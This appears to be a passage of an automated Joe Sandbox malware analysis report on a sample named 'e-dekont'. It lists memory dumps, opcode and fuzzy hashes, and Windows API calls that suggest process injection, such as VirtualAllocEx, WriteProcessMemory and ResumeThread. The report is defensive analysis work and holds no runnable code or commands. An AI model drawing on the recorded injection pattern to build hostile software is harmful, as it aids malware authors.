                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-1437089595
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q
                                                        • API String ID: 0-3743469327
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 3H5$3H5
                                                        • API String ID: 0-2752242361
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0761607E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0761607E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0295B016
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 029559C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: a76993d02d29b592eba2fa48907b366c617a6d77a142381a89f8e032ea334062
                                                        • Instruction ID: 462e1101ebd2ba896ad4f43dc95ecadd919d1709c52c9991182c53a175f7c207
                                                        • Opcode Fuzzy Hash: a76993d02d29b592eba2fa48907b366c617a6d77a142381a89f8e032ea334062
                                                        • Instruction Fuzzy Hash: 5141F1B0D00629CFDB24DFA9C9847DDBBB5BF48304F64806AD418AB251DB75698ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 029559C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: b4602006e2d0427a9f0cae4714b0042a05fdd4aabd228ffea87f888fc7a0e652
                                                        • Instruction ID: beec43856ef82cafd45ffc4b4e78a2b4e64ed2d8295a5ecb3cd687043805e9c3
                                                        • Opcode Fuzzy Hash: b4602006e2d0427a9f0cae4714b0042a05fdd4aabd228ffea87f888fc7a0e652
                                                        • Instruction Fuzzy Hash: 2A41D2B0D0071DCBDB24DFA9C8447DEBBB5BF49304F64806AD408AB255DB75A94ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05064061
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1664124841.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5060000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: bbfbf041b4273da4ee5c1cbe9194aaa38e1b494f5de02a6c74439ae448ebfc37
                                                        • Instruction ID: 3e4f6e5bc39e6d420271fa9912a31419c397d5a825900bff7ac32b834c23bc41
                                                        • Opcode Fuzzy Hash: bbfbf041b4273da4ee5c1cbe9194aaa38e1b494f5de02a6c74439ae448ebfc37
                                                        • Instruction Fuzzy Hash: 934116B4A00319DFDB14CF99D488AAEBBF6FB88314F24C459D519AB321D775A841CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07615C50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 7891a37ba92d335e8434dda205a456fce11566a74872917ee1012008cc4c5976
                                                        • Instruction ID: 26191ea4bb3a6da3097aa2052f07d70f74d04b72444ba66f7317f884a6d1d52e
                                                        • Opcode Fuzzy Hash: 7891a37ba92d335e8434dda205a456fce11566a74872917ee1012008cc4c5976
                                                        • Instruction Fuzzy Hash: 3F2155B29003499FCB10CFA9C884BDEBBF4FF88310F14842AE959A7250C7789950CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07615C50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 7e5648baa3eeaf8cc5615a3d58f324d765b156e0774883bc5794b149f4ae81f6
                                                        • Instruction ID: 18221bea1784ff4257f90c2070feffcb4102017fbb9116b9428e3c08a9321356
                                                        • Opcode Fuzzy Hash: 7e5648baa3eeaf8cc5615a3d58f324d765b156e0774883bc5794b149f4ae81f6
                                                        • Instruction Fuzzy Hash: A32144B19003599FCB10CFA9C884BEEBBF5FF88310F14842AE959A7251C7789954CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07615D30
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 996fa8388da89ef11fcc8502da9128053e8f38b589af0e52e2a2d7339fe9d33b
                                                        • Instruction ID: 2d82f05cf9f39ae1997f679df3de2a492d0cf6be4b961ce13e89602cca63f4ea
                                                        • Opcode Fuzzy Hash: 996fa8388da89ef11fcc8502da9128053e8f38b589af0e52e2a2d7339fe9d33b
                                                        • Instruction Fuzzy Hash: C02128B1C002599FCB10DFAAC884BDEFBF5FF48320F10842AE559A7250C7349955CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07615AA6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 4932e6295f05fe57b52c326688624e7e7cc8e315ee0bb371e20e2a845a0b2121
                                                        • Instruction ID: 8a4e2dba39cac33b09e5e40e0167e68eef943fd14833a107bfa41159a7a0f29e
                                                        • Opcode Fuzzy Hash: 4932e6295f05fe57b52c326688624e7e7cc8e315ee0bb371e20e2a845a0b2121
                                                        • Instruction Fuzzy Hash: BB2137B1D002098FDB10DFAAC4857EEFBF4EF88324F14842AD45AA7251D778A945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0295D366,?,?,?,?,?), ref: 0295D427
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 081645b7f6a03c7a059fc5192188e5d857911a2348c6984876202624267eebe4
                                                        • Instruction ID: 346c8c6772df8f515612bea7eda8acb6844f512675cb1a81ef748f6a103b6fc6
                                                        • Opcode Fuzzy Hash: 081645b7f6a03c7a059fc5192188e5d857911a2348c6984876202624267eebe4
                                                        • Instruction Fuzzy Hash: B42114B5900318DFDB10CF9AD984AEEBBF8EB48310F10805AE958A3350C374A940CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0295D366,?,?,?,?,?), ref: 0295D427
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 5395a0601cee30397edaa2d3d4a55e01e2b8f707ed5569a90c42692a344e57a7
                                                        • Instruction ID: 6a1674aafdbaaa89e6eb62b59212d1c37ff2dfa1878a087a469ef646be9a40fd
                                                        • Opcode Fuzzy Hash: 5395a0601cee30397edaa2d3d4a55e01e2b8f707ed5569a90c42692a344e57a7
                                                        • Instruction Fuzzy Hash: E421E4B5D00258DFDB10CFA9D584ADEBBF4FB08310F14841AE958A3350D378A941CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07615D30
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 5a69ee8e6f3d172227c17da57106e715263c6095b74bea71f4517313e2407680
                                                        • Instruction ID: e6484cd998f278ea8393ed50f7a87b0d1c2c9cd4ab0f5c3758a2000a05c6b30b
                                                        • Opcode Fuzzy Hash: 5a69ee8e6f3d172227c17da57106e715263c6095b74bea71f4517313e2407680
                                                        • Instruction Fuzzy Hash: B42128B1C002599FCB10DFAAC884BDEFBF5FF48310F10842AE559A7250C7349554CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07615AA6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: d121f4216f2e47d757f4d33681cd215d7a8bd51bb01dde277f9a847c7f7d85df
                                                        • Instruction ID: e8337cfdac604d7844a0fed7b292d6311704f035cd073241a9363f5888ce329e
                                                        • Opcode Fuzzy Hash: d121f4216f2e47d757f4d33681cd215d7a8bd51bb01dde277f9a847c7f7d85df
                                                        • Instruction Fuzzy Hash: 462138B1D002098FDB10DFAAC4857EEFBF4EF88324F14842AD459A7251C7789944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076180AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 77752e77e527d9d709678b8293bf013aac0736c8eba8f7c41eb9365fa2e0294d
                                                        • Instruction ID: d2a2867a60d301de02ae2a6b870d1b993f63bf33142057844040c2e8794530f0
                                                        • Opcode Fuzzy Hash: 77752e77e527d9d709678b8293bf013aac0736c8eba8f7c41eb9365fa2e0294d
                                                        • Instruction Fuzzy Hash: B311B4B2A0431A8FDB11DFA5D9093EEBBF1AF44320F194469D442B7350CB795900CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07615B6E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 6c2b4fe3faea1122637b1375c6a7fda4207e7ea59039fe605b3b21d2d865df8d
                                                        • Instruction ID: 34716beaedc9baf7566f0f69c6dc7e08b3ce898f699e164c2e82c3a1156bf534
                                                        • Opcode Fuzzy Hash: 6c2b4fe3faea1122637b1375c6a7fda4207e7ea59039fe605b3b21d2d865df8d
                                                        • Instruction Fuzzy Hash: 54115CB68002499FCB10DFA9C844BDEFFF5EF88324F148419D555A7250C7359550CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0295B491,00000800,00000000,00000000), ref: 0295B682
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: e6cf9cc1ba4bfbe5273b3dbeb3e5bbecd00760faf64df91a9c300ffaa0018086
                                                        • Instruction ID: 37a393b428f863fa385e3de351cea8f9aaa38e9df05db75ac1dfb1e0787ba18d
                                                        • Opcode Fuzzy Hash: e6cf9cc1ba4bfbe5273b3dbeb3e5bbecd00760faf64df91a9c300ffaa0018086
                                                        • Instruction Fuzzy Hash: D01126B6D013589FDB10CF9AD444AEEFBF4EB48328F10842AE859A7210C375A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0295B491,00000800,00000000,00000000), ref: 0295B682
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 6839bd95b5a0e29ac4600a6c5b0a83cd9f629517b9a5a2c77970444863070aa6
                                                        • Instruction ID: 9d37d64a657b09b8fdc05a76bd04b71ac7fbb1e18566d936e132e45edfd59b65
                                                        • Opcode Fuzzy Hash: 6839bd95b5a0e29ac4600a6c5b0a83cd9f629517b9a5a2c77970444863070aa6
                                                        • Instruction Fuzzy Hash: A81123B6D013588FCB10CFAAD544BDEFBF4EB58324F10842AD859A7610C375A546CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07615B6E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 2609d7eb0d92f476349e64b5ef1383ffc2283a0536c69d2f29558747bcceb241
                                                        • Instruction ID: 8c36bec88dd6645c89f1d406c2bd9f98da41acbd65b08ae7e81621ed1ffeedc5
                                                        • Opcode Fuzzy Hash: 2609d7eb0d92f476349e64b5ef1383ffc2283a0536c69d2f29558747bcceb241
                                                        • Instruction Fuzzy Hash: 6E116AB18002499FCB10DFA9C844BDEFFF5EF88324F148419D559A7250C7359550CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ResumeThread.KERNELBASE(00000004), ref: 076155A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: e60e47bc68c69f7c1bade9f84f737c058a5363385856c981d9e5d13eb22b9f6e
                                                        • Instruction ID: 1e52a07e2923e158b1a2158b1e2dd7b7777905182a3cc689e0a23c2c8d4412d9
                                                        • Opcode Fuzzy Hash: e60e47bc68c69f7c1bade9f84f737c058a5363385856c981d9e5d13eb22b9f6e
                                                        • Instruction Fuzzy Hash: 4C1158B19002488FDB10DFAAC4487DEFBF5AF88324F24842AD45AA7250C635A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ResumeThread.KERNELBASE(00000004), ref: 076155A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: bdcd4c6ade21a9df428f0e017e45e79660aab24304330d003255bff8f6465529
                                                        • Instruction ID: 14b7c9704d912a6bde365323588d95e730b33996ec81ac81dc9221a8cdb9e3ed
                                                        • Opcode Fuzzy Hash: bdcd4c6ade21a9df428f0e017e45e79660aab24304330d003255bff8f6465529
                                                        • Instruction Fuzzy Hash: EB113AB1D002498FCB10DFAAC4497DEFBF5EF88324F248419D45AA7250C775A544CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0295B016
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 9c2630f7c0927ec34d856a37cab0a0a8fcde9686349e09c22e0853dd5828f569
                                                        • Instruction ID: 764adba90273aab6a806fe2c332413c849bda954e24b537a9e3d5b38b31d3483
                                                        • Opcode Fuzzy Hash: 9c2630f7c0927ec34d856a37cab0a0a8fcde9686349e09c22e0853dd5828f569
                                                        • Instruction Fuzzy Hash: C71102B6D003598FCB20DF9AC444ADEFBF4AF49324F10842AD869A7210C375A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076180AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076180AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O};5
                                                        • API String ID: 0-3558557551
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O};5
                                                        • API String ID: 0-3558557551
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: B!p
                                                        • API String ID: 0-1355146339
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 785f59a4d233da17ae6f9c77ca24bb59a0c4910e5e46a2cea99e4cf7c257e207
                                                        • Instruction ID: 75bb1e651b97625e8a8da3cdf418de16e1bcc6dec65a2ce67d53845eb838f5d7
                                                        • Opcode Fuzzy Hash: 785f59a4d233da17ae6f9c77ca24bb59a0c4910e5e46a2cea99e4cf7c257e207
                                                        • Instruction Fuzzy Hash: 5D217574A10608DFD748DF5AE085999BFF2FF8C310F9280D5D4489B365D735AAA5CB01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7ea81941d217321558434d87cdcc1a364a7ff86a231d0f3f5e0e24a3f2cce5c8
                                                        • Instruction ID: 3cd46706fabab74eca51b977921bbcd439827eb5332b803e300a912d923fd2b8
                                                        • Opcode Fuzzy Hash: 7ea81941d217321558434d87cdcc1a364a7ff86a231d0f3f5e0e24a3f2cce5c8
                                                        • Instruction Fuzzy Hash: 0711A3B5A003068FAB15DF799C516BFBBF6EFC4260354452AD52CD7380EF30990587A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f4cff0a6a6bcbb85b4ec3d9999552f83e54010ccd28235c4e93f5eb621befa1
                                                        • Instruction ID: 60a14942291a0d362a4eebce19e82549f9fc9baa426c9eb5e0ef93dd9d742c23
                                                        • Opcode Fuzzy Hash: 4f4cff0a6a6bcbb85b4ec3d9999552f83e54010ccd28235c4e93f5eb621befa1
                                                        • Instruction Fuzzy Hash: 252108F4E0520ADFCB44CF99C1819AEBBF9EF49340F60A095D909A7751D370AA40CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1659615917.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_ddd000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
